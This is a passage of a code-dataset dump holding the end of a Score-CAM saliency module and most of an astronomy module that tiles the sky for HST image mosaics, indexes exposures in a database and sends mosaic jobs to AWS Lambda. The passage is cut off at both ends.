1)*norm_saliency_maps.cpu(),\n dim=0, keepdim=True)\n \n score_saliency_map = F.relu(score_saliency_map)\n score_saliency_map_min, score_saliency_map_max = score_saliency_map.min(), score_saliency_map.max()\n\n if score_saliency_map_min == score_saliency_map_max:\n return None\n\n score_saliency_map = (score_saliency_map - score_saliency_map_min).div(score_saliency_map_max - score_saliency_map_min).data\n score_saliency_map = score_saliency_map.to(self.device)\n\n output = self.model_arch(input * score_saliency_map)\n final_logit = output[0][predicted_class]\n final_score = F.softmax(output[0], dim=-1)[predicted_class]\n \n return score_saliency_map.cpu(), final_logit.cpu(), final_score.cpu()\n\n\n\n def BatchScoreComputation(self, mask_batch: torch.Tensor):\n with torch.no_grad():\n mask_batch = mask_batch.to(self.device)\n logits = self.model_arch(self.input_ * mask_batch)\n target_score = F.softmax(logits, dim=1)[:, self.class_idx]\n return target_score.cpu().squeeze(1)\n\n def __call__(self, input, class_idx=None, retain_graph=False):\n return self.forward(input, class_idx, retain_graph)\n","repo_name":"sweet-shark/MeTFA-A-Robustness-Evaluation-Framework-for-Feature-Attribution","sub_path":"cam/scorecam.py","file_name":"scorecam.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"39619493643","text":"\"\"\"\nDrizzled mosaics in tiles and subregions\n\nHere the sky is tesselated in 4 degree patches with sizes that are \nincreased slightly to be integer multiples of 512 0.1\" pixels\n\nIndividual subtiles are 256 x 0.1\" = 25.6\"\n\n\"\"\"\nimport os\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom . import db\n\nPIXEL_SCALE = 0.1\n\ndef define_tile_grid(a=4., phase=0.6):\n \"\"\"\n Define the tile grid following the PS1 tesselation algorithm from \n T. Budavari\n https://outerspace.stsci.edu/display/PANSTARRS/PS1+Sky+tessellation+patterns#PS1Skytessellationpatterns-ProjectioncellsintheRINGS.V3tessellation\n\n Paramters\n ---------\n a : float\n Tile size in degrees\n \n phase : float\n Shift the RA grid by some phase amount to better align tiles with some\n survey fields\n \"\"\"\n import numpy as np\n from matplotlib import pyplot as plt\n \n from astropy import units as u\n import ligo.skymap.plot\n\n from astropy.coordinates import SkyCoord\n import astropy.wcs as pywcs\n \n from grizli import utils\n\n # bottom of first decl row at d=0\n dn = [a/2./180*np.pi]\n \n # lower decl row *centered* on d=0\n dn = [0] #a/2./180*np.pi]\n \n # shift up to align survey fields\n dn = [1./180*np.pi]\n \n theta = np.arctan(a/180*np.pi/2)*2\n dn1 = 1\n \n tn = []\n mn = []\n \n dtheta = 1.e-6\n \n while (dn1 < np.pi/2) & (dn1 > 0):\n dlo = dn[-1] - theta/2\n mni = int(np.floor(2*np.pi*np.cos(dlo)/theta)) + 1\n an = 2*np.pi / mni\n dn1 = np.arctan(np.tan(dn[-1] + theta/2.)*np.cos(an/2)) + theta/2\n ddeg = dn1 / np.pi*180\n niter = 0\n \n while ddeg < np.round(ddeg):\n niter += 1\n _theta = theta + dtheta\n dlo = dn[-1] - _theta/2\n _mni = int(np.floor(2*np.pi*np.cos(dlo)/theta)) + 1\n an = 2*np.pi / mni\n _dn1 = np.arctan(np.tan(dn[-1] + _theta/2.)*np.cos(an/2)) + _theta/2\n ddeg = _dn1 / np.pi*180\n if ddeg < np.round(ddeg):\n theta = _theta\n dn1 = _dn1\n mni = _mni\n \n mn.append(mni)\n tn.append(theta)\n \n if (dn1 < np.pi/2.) & (dn1 > 0):\n print(f'{dn[-1]/np.pi*180:.2f} {mni} {niter}')\n dn.append(dn1)\n \n if a == 2:\n dn[-1] = np.pi/2\n mn[-1] = 1\n tn[-1] = theta*2.\n \n elif (a ==4) & (dn[0] == 1./180*np.pi):\n dn[-1] = np.pi/2\n mn[-1] = 1\n tn[-1] = theta*1.5\n \n else:\n dn.append(np.pi/2)\n mn.append(1)\n tn.append(theta)\n\n # Double for negative \n n = len(dn)\n strip = [s for s in range(1, n+1)]\n \n if dn[0] == 0:\n strip = [-s for s in strip[::-1]] + strip[1:]\n dn = [-dni for dni in dn[::-1]] + dn[1:]\n mn = mn[::-1] + mn[1:]\n tn = tn[::-1] + tn[1:]\n else:\n strip = [-s for s in strip[::-1]] + strip\n dn = [-dni for dni in dn[::-1]] + dn\n mn = mn[::-1] + mn\n tn = tn[::-1] + tn\n \n strip = [s for s in range(len(dn))]\n \n # Plot footprints\n import matplotlib.pyplot as plt\n from tqdm import tqdm\n \n kw = {'projection':'astro hours mollweide'}\n kw = {'projection':'astro globe'}\n kw = {'projection':'astro globe', 'center':'0d +70d'}\n \n kw = dict(projection='astro degrees zoom',\n center='0h 86d', radius='10 deg')\n\n #kw = dict(projection='astro degrees zoom',\n # center='0h 0d', radius='6 deg')\n \n plt.close('all')\n fig, ax = plt.subplots(1,1,figsize=(8,8), \n subplot_kw=kw)\n\n #plt.title(\"Aitoff projection of our random data\")\n \n ax.grid()\n \n nedge = 10\n step = np.linspace(0, 1, nedge)\n zeros = np.zeros(nedge)\n px = np.hstack([step, zeros+1, step[::-1], zeros])\n py = np.hstack([zeros, step, zeros+1, step[::-1]])\n \n dpix = []\n da = []\n \n names = ['tile', 'strip', 'nx', \n 'crpix1','crpix2','crval1','crval2','npix',\n 'r1','d1','r2','d2','r3','d3','r4','d4']\n \n rows = []\n tileid = 0\n \n for j in tqdm(range(len(dn))):\n \n ai = 2*np.tan(tn[j]/2)*180/np.pi\n npix = ai*3600/PIXEL_SCALE\n npixr = int(npix // 512 + 1)*512\n ai = npixr*PIXEL_SCALE/3600\n da.append(ai)\n dpix.append(npixr)\n \n ddeg = dn[j]/np.pi*180\n \n h, w = utils.make_wcsheader(ra=0, dec=ddeg, size=ai*3600, \n pixscale=PIXEL_SCALE)\n h['CRPIX1'] += 0.5\n h['CRPIX2'] += 0.5\n \n ras = np.linspace(0, 2*np.pi, np.maximum(mn[j]+1, 1))[:-1]\n \n # Shift to avoid straddling ra=0\n if mn[j] > 1:\n ras += ras[1]*phase\n \n col = 'k'\n \n for ir, r in enumerate(ras):\n h['CRVAL1'] = r/np.pi*180\n h['CRVAL2'] = ddeg\n w = pywcs.WCS(h)\n fp = w.calc_footprint()\n \n tileid += 1\n row = [tileid, strip[j], ir+1]\n for k in ['CRPIX1','CRPIX2','CRVAL1','CRVAL2']:\n row.append(h[k])\n \n row.append(npixr)\n row.extend(fp.flatten().astype(np.float32).tolist())\n rows.append([d for d in row])\n \n #fpx, fpy = w.calc_footprint().T\n #fpx = np.append(fpx, fpx[0])\n #fpy = np.append(fpy, fpy[0])\n fpx, fpy = w.all_pix2world(px*npixr, py*npixr, 0)\n \n if ir > 0:\n pl = ax.plot_coord(SkyCoord(fpx, fpy, unit=('deg','deg')), \n color=col, alpha=0.5, linewidth=1)#, marker='.')\n else:\n pl = ax.plot_coord(SkyCoord(fpx, fpy, unit=('deg','deg')), \n alpha=0.5, linewidth=1)#, marker='.')\n col = pl[0].get_color()\n \n if (j == 42) & (ir == 1):\n for ik in range(5):\n for jk in range(5):\n slx = slice(ik*256, (ik+1)*256)\n sly = slice(jk*256, (jk+1)*256)\n \n wsl = w.slice((sly, slx))\n fpx, fpy = wsl.all_pix2world(px*256, py*256, 0)\n pl = ax.plot_coord(SkyCoord(fpx, fpy, \n unit=('deg','deg')), \n color='k', alpha=0.5, linewidth=1)\n \n tab = utils.GTable(names=names, rows=rows)\n \n return tab\n \n ###### Checking\n df = tab.to_pandas()\n df.to_sql('mosaic_tiles', db._ENGINE, index=False, if_exists='fail', \n method='multi')\n \n # Look at HST fields\n \n avg_coo = db.SQL(\"\"\"SELECT parent, count(parent), \n avg(ra) as ra, avg(dec) as dec\n FROM assoc_table where ra > 0\n GROUP by parent order by count(parent)\"\"\")\n \n exp = db.SQL('SELECT assoc, crval1, crval2, footprint FROM exposure_files')\n coo = SkyCoord(exp['crval1'], exp['crval2'], unit=('deg','deg'))\n \n # old\n avg_coo = db.SQL(\"\"\"SELECT parent, count(parent), \n avg(ra) AS ra, avg(dec) as dec \n FROM exposure_log\n WHERE ra > 0 \n AND awspath not like '%%grizli-cosmos-v2%%'\n GROUP by parent order by count(parent)\"\"\")\n \n exp = db.SQL(\"\"\"SELECT parent, ra, dec \n FROM exposure_log \n WHERE ra > 0 \n AND awspath NOT LIKE '%%grizli-cosmos-v2%%'\"\"\")\n \n coo = SkyCoord(exp['ra'], exp['dec'], unit=('deg','deg'))\n \n ra, dec = 150.1, 2.2 # cosmos\n ra, dec = 150.1, 2.2 # cosmos\n \n test = avg_coo['count'] > 20\n test = avg_coo['count'] > 150\n \n for k in np.where(test)[0]:\n print(avg_coo['parent'][k])\n ra, dec = avg_coo['ra'][k], avg_coo['dec'][k]\n \n ctab = utils.GTable()\n ctab['ra'] = [ra]\n ctab['dec'] = dec\n idx, dr = ctab.match_to_catalog_sky(tab, other_radec=('crval1','crval2'))\n \n kw = dict(projection='astro degrees zoom',\n center=f'{ra}d {dec}d', radius='9 deg')\n \n #plt.close('all')\n fig, ax = plt.subplots(1,1,figsize=(8,8), \n subplot_kw=kw)\n \n corners = np.array([np.array(tab[c]) for c in ['r1','d1','r2','d2','r3','d3','r4','d4']])[:,dr < 10*u.deg].T\n \n ax.plot_coord(coo, linestyle='None', marker='.')\n \n for c in corners:\n cc = np.append(c, c[:2])\n ci = SkyCoord(cc[0::2], cc[1::2], unit=('deg','deg'))\n ax.plot_coord(ci, color='k', alpha=0.5, linewidth=1)\n \n ax.grid()\n ax.set_title(avg_coo['parent'][k])\n\n\ndef add_exposure_batch():\n \"\"\"\n Add a bunch of exposures to the `mosaic_tiles_exposures` table\n \"\"\" \n import astropy.table\n import astropy.table\n from tqdm import tqdm\n \n from grizli.aws.tile_mosaic import add_exposure_to_tile_db\n \n filters = db.SQL(\"\"\"SELECT filter, count(filter) \n FROM exposure_files \n GROUP BY filter \n ORDER BY count(filter)\"\"\")\n \n ii = len(filters)-1\n filt = 'F814W'\n \n for ii, filt in enumerate(filters['filter']):\n print(f\"{ii} / {len(filters)} {filt} {filters['count'][ii]}\")\n \n exp = db.SQL(f\"\"\"SELECT eid, assoc, dataset, extension, filter, \n sciext, crval1 as ra, crval2 as dec, footprint\n FROM exposure_files\n WHERE filter = '{filt}'\"\"\")\n \n tiles = db.SQL('select * from mosaic_tiles')\n \n res = [add_exposure_to_tile_db(row=exp[i:i+1], tiles=tiles)\n for i in tqdm(range(len(exp)))]\n \n for j in range(len(res))[::-1]:\n if res[j] is None:\n print(f\"Pop {exp['assoc'][j]} {j}\")\n res.pop(j)\n \n db.execute(f\"\"\"DELETE from mosaic_tiles_exposures t\n USING exposure_files e\n WHERE t.expid = e.eid\n AND filter = '{filt}'\n \"\"\")\n \n N = 100\n for j in tqdm(range(len(res)//N+1)):\n sl = slice(j*N, (j+1)*N)\n #print(j, sl.start, sl.stop)\n \n tab = astropy.table.vstack(res[sl])\n \n df = tab.to_pandas()\n df.to_sql('mosaic_tiles_exposures', db._ENGINE, index=False, \n if_exists='append', method='multi')\n #\n # Table updates\n if 0:\n db.execute('ALTER TABLE exposure_files ADD COLUMN eid SERIAL PRIMARY KEY;')\n\n db.execute('GRANT ALL PRIVILEGES ON ALL TABLEs IN SCHEMA public TO db_iam_user')\n db.execute('GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO db_iam_user')\n db.execute('GRANT SELECT ON ALL TABLEs IN SCHEMA public TO readonly')\n db.execute('GRANT SELECT ON ALL SEQUENCES IN SCHEMA public TO readonly')\n \n db.execute('ALTER TABLE assoc_table ADD COLUMN aid SERIAL PRIMARY KEY;')\n db.execute('CREATE INDEX on exposure_files (eid)')\n db.execute('CREATE INDEX on exposure_files (eid,filter)')\n db.execute('CREATE INDEX on mosaic_tiles_exposures (expid)')\n\n db.execute('CREATE INDEX on mosaic_tiles_exposures (tile, subx, suby)')\n \ndef make_exposure_maps():\n \"\"\"\n \"\"\"\n\n from grizli import utils\n from grizli.aws import tile_mosaic\n from grizli.aws import db\n \n filt = 'F160W'\n \n ra, dec, rsize, name = 53.14628, -27.814, 20, 'gds'\n #ra, dec, rsize, name = 189.22592, 62.24586, 20, 'gdn'\n # ra, dec, rsize, name = 214.95, 52.9, 20, 'egs'\n ra, dec, rsize, name = 150.11322, 2.24068, 48, 'cos'\n ra, dec, rsize, name = 34.34984, -5.18390, 30, 'uds'\n \n ra, dec, rsize, name = 177.40124999999998, 22.39947222222, 12, 'macs1149'\n ra, dec, rsize, name = 157.30641, 26.39197, 12, 'sdss1029'\n ra, dec, rsize, name = 215.93, 24.07, 15, 'macs1423'\n ra, dec, rsize, name = 64.39, -11.91, 15, 'macs0417'\n ra, dec, rsize, name = 3.5301941, -30.3854942, 15, 'abell2744'\n extra = ''\n \n fig, tab = tile_mosaic.exposure_map(ra, dec, rsize, name, \n filt=filt.upper(), s0=18, \n extra=extra)\n fig.tight_layout(pad=0.5)\n fig.savefig('/tmp/map.png')\n fig.tight_layout(pad=0.5)\n fig.savefig('/tmp/map.png')\n \n from grizli.aws import db\n mf = db.SQL(\"\"\"\n SELECT * from mosfire_extractions natural join mosfire_datemask\n \"\"\")\n \n # MF with HST\n # SQL = f\"\"\"SELECT m.file, count(m.file)\n # FROM mosfire_extractions m, exposure_files e\n # WHERE ('(' || ra_targ || \n # ', ' || dec_targ || ')')::point\n # <@ polygon(e.footprint)\n # GROUP BY m.file\"\"\"\n # \n # res = db.SQL(SQL) \n \n ###############\n \ndef find_mosaic_segments(bs=16):\n \"\"\"\n \n Find \"segments\" of connected subimages within a tile\n \n bs : bin size relative to 256*0.1\" subimages\n \n \"\"\"\n from scipy.ndimage import label\n\n from grizli import utils\n from grizli.aws import db\n \n cells = db.SQL(f\"\"\"SELECT tile, subx, suby, subra, subdec, filter, \n assoc, dataset, exptime\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid\n \"\"\")\n \n cells['segment'] = 0\n \n un = utils.Unique(cells['tile'])\n ns = 0\n \n for t in un.values:\n uni = np.where(un[t])[0]\n \n # img = np.zeros((cells['suby'][uni].max()+1, \n # cells['subx'][uni].max()+1), dtype=bool)\n # img[cells['suby'][uni], cells['subx'][uni]] = True\n \n bs = 16\n \n img = np.zeros((cells['suby'][uni].max()//bs+1, \n cells['subx'][uni].max()//bs+1), dtype=bool)\n img[cells['suby'][uni]//bs, cells['subx'][uni]//bs] = True\n \n labeled_array, num_features = label(img)\n \n cells['segment'][uni] = labeled_array[cells['suby'][uni]//bs, \n cells['subx'][uni]//bs] + ns\n \n print(f'tile: {t} npatch: {num_features}')\n \n ns += num_features\n\n \n names = ['tile','patch','ra','dec','jname','count','filter',\n 'xmin','xmax','ymin','ymax',\n 'rmin','rmax','dmin','dmax','status','mtime']\n \n un = utils.Unique(cells['segment'])\n rows = []\n \n import astropy.time\n from tqdm import tqdm\n \n for s in tqdm(un.values):\n uni = np.where(un[s])[0]\n \n unf = utils.Unique(cells['filter'][uni], verbose=False)\n ra = np.mean(cells['subra'][uni])\n dec = np.mean(cells['subdec'][uni])\n jname = utils.radec_to_targname(ra=ra, dec=dec)\n for f in unf.values:\n unfi = cells[uni][unf[f]]\n \n row = [unfi['tile'][0], unfi['segment'][0], \n ra, dec, jname, len(unfi), f, \n unfi['subx'].min(), unfi['subx'].max(), \n unfi['suby'].min(), unfi['suby'].max(), \n unfi['subra'].min(), unfi['subra'].max(), \n unfi['subdec'].min(), unfi['subdec'].max(),\n 0, astropy.time.Time.now().mjd]\n rows.append(row)\n \n patches = utils.GTable(names=names, rows=rows)\n \n i = 0\n t0 = 0\n \n for i in range(30):\n t = patches['tile'][i]\n\n os.system(f\"\"\"aws s3 sync s3://grizli-mosaic-tiles/Tiles/{t}/ ./ --exclude \"*\" --include \"*{patches['filter'][i].lower()}*sci.fits\" \"\"\")\n \n build_mosaic_from_subregions(root=patches['jname'][i], tile=t, \n files=None, \n filter=patches['filter'][i].lower())\n #\n os.system(f'rm tile.{t0:04d}*')\n \n\n\ndef get_axis_center_coord(ax):\n \"\"\"\n Get sky coords at the center of symap axis\n \"\"\"\n \n tr = ax.get_transform('world').inverted()\n return tr.transform((np.mean(ax.get_xlim()), np.mean(ax.get_ylim())))\n\n\ndef exposures_in_axis(ax, extra_where=\"\"):\n \"\"\"\n Query exposure_files\n \"\"\"\n coo = get_axis_center_coord(ax)\n \n point = f\"point '({coo[0]}, {coo[1]})'\"\n \n res = db.SQL(f\"\"\"SELECT file, filter, assoc from exposure_files \n WHERE polygon(footprint) @> {point}\n {extra_where}\n ORDER BY assoc\n \"\"\")\n return res\n \n \ndef exposure_map(ra, dec, rsize, name, filt='F160W', s0=16, cmap='viridis', figsize=(6,6), show_tiles=True, res=None, alpha=1., ec='None', vmin=None, vmax=None, extra=''):\n \"\"\"\n Make an exposure map from a database query\n \"\"\"\n import ligo.skymap.plot\n from matplotlib import pyplot as plt\n import numpy as np\n \n from astropy.coordinates import SkyCoord\n from grizli.aws import tile_mosaic\n from grizli import utils\n \n cosd = np.cos(dec/180*np.pi)\n \n if res is None:\n res = db.SQL(f\"\"\"SELECT tile, subx, suby, subra, subdec, filter, \n COUNT(filter) as nexp, \n SUM(exptime) as exptime,\n MIN(expstart) as tmin, \n MAX(expstart) as tmax \n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid\n AND filter = '{filt}'\n {extra}\n AND ABS(subra - {ra})*{cosd} < {rsize/60}\n AND ABS(subdec - {dec}) < {rsize/60}\n GROUP BY tile, subx, suby, subra, subdec, filter\n \"\"\")\n\n kw = dict(projection='astro hours zoom',\n center=f'{ra}d {dec}d', radius=f'{rsize} arcmin')\n \n s = np.maximum(s0*18/rsize, 1)\n \n fig, ax = plt.subplots(1,1,figsize=figsize, \n subplot_kw=kw)\n \n ax.grid()\n \n coo = SkyCoord(res['subra'], res['subdec'], unit=('deg','deg'))\n ax.scatter(coo.ra, coo.dec, \n c=np.log10(res['exptime']),\n marker='s', s=s, \n cmap=cmap, alpha=alpha, ec=ec, \n vmin=vmin, vmax=vmax, \n transform=ax.get_transform('world'))\n \n #ax.scatter_coord(coo, c=np.log10(res['exptime']), marker='s', s=s, \n # cmap=cmap, alpha=alpha, ec=ec, vmin=vmin, vmax=vmax)\n \n if show_tiles:\n for t in np.unique(res['tile']):\n twcs = tile_mosaic.tile_wcs(t)\n coo = SkyCoord(*twcs.calc_footprint().T, unit=('deg','deg'))\n ax.plot_coord(coo, color='r', linewidth=1.2, alpha=0.5)\n\n # Tile labels\n un = utils.Unique(res['tile'], verbose=False)\n\n dp = 512*0.1/3600\n rp = dp/cosd\n \n for t in un.values:\n c = (res['subra'][un[t]].min(), res['subdec'][un[t]].min(), \n res['subra'][un[t]].max(), res['subdec'][un[t]].max())\n #\n cp = (res['subx'][un[t]].min(), res['suby'][un[t]].min(), \n res['subx'][un[t]].max(), res['suby'][un[t]].max())\n \n rc = np.array([c[0]-rp, c[0]-rp, c[2]+rp, c[2]+rp, c[0]-rp])\n dc = np.array([c[1]-dp, c[3]+dp, c[3]+dp, c[1]-dp, c[1]-dp])\n \n label = f'{t:04d}: {cp[0]:03d} - {cp[2]:03d}, {cp[1]:03d} - {cp[3]:03d}'\n \n ax.plot_coord(SkyCoord(rc, dc, unit=('deg','deg')),\n alpha=0.8, label=label, linewidth=1.2)\n \n ax.legend()\n \n ax.set_xlabel('R.A.')\n ax.set_ylabel('Dec.')\n ax.set_title(f'{name} - {filt}')\n \n #fig.tight_layout(pad=0.8)\n \n return fig, res\n\n\nTILES = None\nTILE_WCS = {}\n\ndef coords_to_subtile(ra=189.0243001, dec=62.19669, size=0):\n \"\"\"\n Get tile/subtile associated with sky coordinates\n \"\"\"\n from grizli import utils\n from astropy.coordinates import SkyCoord\n import astropy.units as u\n \n global TILES, TILE_WCS\n \n if TILES is None:\n print('Initialize TILES')\n \n if os.path.exists('TILES.csv'):\n TILES = utils.read_catalog('TILES.csv')\n else:\n TILES = db.SQL('select * from mosaic_tiles')\n \n TILES['nsub'] = TILES['npix'] // 256\n TILES['coo'] = SkyCoord(TILES['crval1'], TILES['crval2'], \n unit=('deg','deg'))\n \n dr = TILES['coo'].separation(SkyCoord(ra, dec, unit=('deg','deg')))\n in_tile = dr < (2*np.sqrt(2)*u.deg)\n xTILES = TILES[in_tile]\n \n tp = np.array([np.squeeze(tile_wcs(t).all_world2pix([ra], [dec], \n 0)).flatten() \n for t in xTILES['tile']]).T\n \n in_tile = ((tp > 0) & (tp < xTILES['npix'])).sum(axis=0) == 2\n subt = xTILES[in_tile]\n \n subt['fsubx'], subt['fsuby'] = tp[:,in_tile] / 256\n subt['subx'] = subt['fsubx'].astype(int)\n subt['suby'] = subt['fsuby'].astype(int)\n \n ds = size/PIXEL_SCALE/256\n subt['xmin'] = np.clip(subt['fsubx'] - ds, 0, subt['npix']).astype(int)\n subt['xmax'] = np.clip(subt['fsubx'] + ds, 0, subt['npix']).astype(int)\n subt['ymin'] = np.clip(subt['fsuby'] - ds, 0, subt['npix']).astype(int)\n subt['ymax'] = np.clip(subt['fsuby'] + ds, 0, subt['npix']).astype(int)\n \n subt['ncut'] = (subt['xmax'] - subt['xmin'] + 1)\n subt['ncut'] *= (subt['ymax'] - subt['ymin'] + 1)\n so = np.argsort(subt['ncut'])\n \n return subt[so]\n\n\ndef cutout_from_coords(output='mos-{tile}-{filter}_{drz}', ra=189.0243001, dec=62.1966953, size=10, filters=['F160W'], theta=0, clean_subtiles=False, send_to_s3=False, make_weight=True, **kwargs): \n \n subt = coords_to_subtile(ra=ra, dec=dec, size=size)[0]\n \n ll = (subt['xmin'], subt['ymin'])\n ur = (subt['xmax'], subt['ymax'])\n \n resp = []\n for filt in filters:\n ri = build_mosaic_from_subregions(root=output, \n tile=subt['tile'], files=None, \n filter=filt, \n ll=ll, ur=ur,\n clean_subtiles=clean_subtiles, \n make_weight=make_weight,\n send_to_s3=send_to_s3)\n resp.append(ri)\n \n return resp\n\n\ndef add_exposure_to_tile_db(dataset='ibev8xubq', sciext=1, tiles=None, row=None):\n \"\"\"\n Find subtiles that overlap with an exposure in the `exposure_files`\n table\n \"\"\"\n import astropy.table\n import astropy.units as u\n import astropy.wcs as pywcs\n \n import numpy as np\n from grizli import utils\n \n global TILES\n \n if TILES is None:\n TILES = db.SQL('select * from mosaic_tiles')\n \n if tiles is None:\n tiles = TILES\n\n if row is None:\n row = db.SQL(f\"\"\"SELECT eid, assoc, dataset, extension, filter, \n sciext, crval1 as ra, crval2 as dec, footprint \n from exposure_files\n where filter = 'F160W' \n and dataset = '{dataset}' \n AND sciext={sciext}\"\"\")\n \n if len(row) == 0:\n print(f'No exposure data found for dataset={dataset} sciext={sciext}')\n return None\n \n idx, dr = row.match_to_catalog_sky(tiles, other_radec=('crval1','crval2'))\n \n tix = np.where(dr < 4*np.sqrt(2)*u.deg)[0]\n #tix = np.where(dr < 4*u.deg)[0]\n \n exp_poly = None\n for fp in row['footprint']:\n sr = utils.SRegion(fp)\n sra = sr.xy[0][:,0]\n if (sra.min() < 10) & (sra.max() > 350):\n sra[sra > 350] -= 360\n \n sr.xy[0][:,0] = sra\n \n for p, s in zip(sr.get_patch(alpha=0.5, color='k'), sr.shapely):\n if exp_poly is None:\n exp_poly = s\n else:\n exp_poly = exp_poly.union(s)\n \n # ax.add_patch(p)\n \n sbuff = utils.SRegion(np.array(exp_poly.buffer(1./60).boundary.xy).T)\n \n tabs = []\n \n for t in tix:\n \n h, w = utils.make_wcsheader(ra=tiles['crval1'][t], \n dec=tiles['crval2'][t],\n size=tiles['npix'][t]*PIXEL_SCALE, \n pixscale=PIXEL_SCALE)\n \n h['CRPIX1'] += 0.5\n h['CRPIX2'] += 0.5\n h['LATPOLE'] = 0.\n \n w = pywcs.WCS(h)\n wfp = w.calc_footprint()\n wra = wfp[:,0]\n if (wra.min() < 10) & (wra.max() > 350):\n if sr.centroid[0][0] < 10:\n wra[wra > 350] -= 360\n else:\n wra[wra < 10] += 360\n \n wfp[:,0] = wra\n \n srt = utils.SRegion(wfp)\n \n if not sr.shapely[0].intersects(srt.shapely[0]):\n continue\n \n nsub = tiles['npix'][t]//256\n step = np.arange(nsub)\n px, py = np.meshgrid(step, step)\n px = px.flatten()\n py = py.flatten()\n rd = w.all_pix2world(px*256+128, py*256+128, 0)\n pts = np.array([rd[0], rd[1]]).T\n test = sbuff.path[0].contains_points(pts)\n tw = np.where(test)[0]\n if test.sum() == 0:\n continue\n \n for j, xi, yi in zip(tw, px[tw], py[tw]):\n wsl = w.slice((slice(yi*256, (yi+1)*256), \n slice(xi*256, (xi+1)*256)))\n sw = utils.SRegion(wsl.calc_footprint())\n test[j] = sw.shapely[0].intersects(exp_poly)\n \n if test.sum() == 0:\n continue\n \n tmatch = utils.GTable()\n tmatch['tile'] = [tiles['tile'][t]] * test.sum()\n tmatch['subx'] = px[test]\n tmatch['suby'] = py[test]\n tmatch['subra'] = rd[0][test]\n tmatch['subdec'] = rd[1][test]\n tmatch['expid'] = np.unique(row['eid'])[0]\n # tmatch['eassoc'] = np.unique(row['assoc'])[0]\n # tmatch['edataset'] = np.unique(row['dataset'])[0]\n # tmatch['eext'] = np.unique(row['sciext'])[0]\n tmatch['in_mosaic'] = 0\n tabs.append(tmatch)\n \n if len(tabs) > 0:\n tmatch = astropy.table.vstack(tabs)\n return tmatch\n else:\n return None\n\n\ndef tile_wcs(tile):\n \"\"\"\n Compute tile WCS\n \"\"\"\n import astropy.wcs as pywcs\n from grizli import utils\n from grizli.aws import db\n \n global TILES, TILE_WCS\n if TILES is None:\n TILES = db.SQL('select * from mosaic_tiles')\n \n if tile not in TILES['tile']:\n print(f'{tile} not in `mosaic_tiles`')\n return None\n \n if tile in TILE_WCS:\n return TILE_WCS[tile]\n \n row = TILES[TILES['tile'] == tile]\n \n # row = db.SQL(f\"\"\"SELECT crval1, crval2, npix\n # FROM mosaic_tiles\n # WHERE tile={tile}\"\"\")\n\n t = 0\n h, w = utils.make_wcsheader(ra=row['crval1'][t], dec=row['crval2'][t],\n size=row['npix'][t]*PIXEL_SCALE,\n pixscale=PIXEL_SCALE)\n \n # h['CRPIX1'] += 0.5\n # h['CRPIX2'] += 0.5\n h['LATPOLE'] = 0.\n \n wcs = pywcs.WCS(h)\n wcs.pscale = PIXEL_SCALE\n \n TILE_WCS[tile] = wcs\n \n return wcs\n \n \ndef tile_subregion_wcs(tile, subx, suby):\n \"\"\"\n Compute WCS for a tile subregion\n \"\"\"\n \n twcs = tile_wcs(tile)\n \n sub_wcs = twcs.slice((slice(suby*256, (suby+1)*256), \n slice(subx*256, (subx+1)*256)))\n sub_wcs.pscale = PIXEL_SCALE\n return sub_wcs\n\n\n#\ndef get_lambda_client(region_name='us-east-1'):\n \"\"\"\n Get boto3 client in same region as HST public dataset\n \"\"\"\n import boto3\n session = boto3.Session()\n client = session.client('lambda', region_name=region_name)\n return client\n\n\ndef send_event_lambda(event, verbose=True, client=None, func='grizli-mosaic_tile'):\n \"\"\"\n Send a single event to AWS lambda\n \"\"\"\n import time\n import os\n import yaml\n\n import numpy as np\n import boto3\n import json\n\n if client is None:\n client = get_lambda_client(region_name='us-east-1')\n\n if verbose:\n print('Send event to {0}: {1}'.format(func, event))\n\n response = client.invoke(FunctionName=func,\n InvocationType='Event', LogType='Tail',\n Payload=json.dumps(event))\n\n\ndef count_locked():\n \"\"\"\n Count number of distinct locked tiles that could still be runing\n on aws lambda\n \"\"\"\n tiles = db.SQL(\"\"\"SELECT tile, subx, suby, filter, count(filter)\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid AND tile != 1183\n AND in_mosaic=9\n GROUP BY tile, subx, suby, filter\n ORDER BY count(filter) DESC\"\"\")\n \n return len(tiles), tiles\n\n\ndef reset_locked():\n \"\"\"\n Reset in_mosaic 9 > 0 for tiles that may have timed out\n \"\"\"\n cmd = \"\"\"UPDATE mosaic_tiles_exposures\n SET in_mosaic = 0 WHERE in_mosaic = 9\"\"\"\n \n db.execute(cmd)\n\n\ndef get_subtile_status(tile=2530, subx=522, suby=461, **kwargs):\n \"\"\"\n `in_mosaic` status of all entries of a subtile\n \"\"\"\n resp = db.SQL(f\"\"\"SELECT tile, subx, suby, filter, \n in_mosaic, count(filter)\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid\n AND tile={tile} AND subx={subx} AND suby={suby}\n GROUP BY tile, subx, suby, filter, in_mosaic\n ORDER BY (filter, in_mosaic)\n \"\"\")\n return resp\n\n\ndef reset_tiles_in_assoc(assoc):\n \"\"\"\n Set in_mosaic status to all subtiles overlapping with an assoc\n \"\"\"\n res = db.execute(f\"\"\"UPDATE mosaic_tiles_exposures\n SET in_mosaic = 0\n FROM (select tile, subx, suby\n from mosaic_tiles_exposures ti, exposure_files e\n where ti.expid = e.eid AND e.assoc = '{assoc}'\n group by tile, subx, suby) subt\n WHERE mosaic_tiles_exposures.tile = subt.tile \n AND mosaic_tiles_exposures.subx = subt.subx\n AND mosaic_tiles_exposures.suby = subt.suby\n \"\"\")\n\n\ndef get_tiles_containing_point(point=(150.24727,2.04512), radius=0.01):\n \"\"\"\n reset in_mosaic status for subtiles overlapping with a point\n \"\"\"\n \n circle = f\"circle '<({point[0]}, {point[1]}), {radius}>'\"\n \n res = db.SQL(f\"\"\"SELECT tile, subx, suby, filter, count(filter) as nexp\n from mosaic_tiles_exposures ti, exposure_files e\n where ti.expid = e.eid\n AND polygon(e.footprint) && polygon({circle}) \n group by tile, subx, suby, filter\n \"\"\")\n\n return res\n\n\ndef reset_tiles_containing_point(point=(150.24727,2.04512), radius=0.01):\n \"\"\"\n reset in_mosaic status for subtiles overlapping with a point\n \"\"\"\n \n circle = f\"circle '<({point[0]}, {point[1]}), 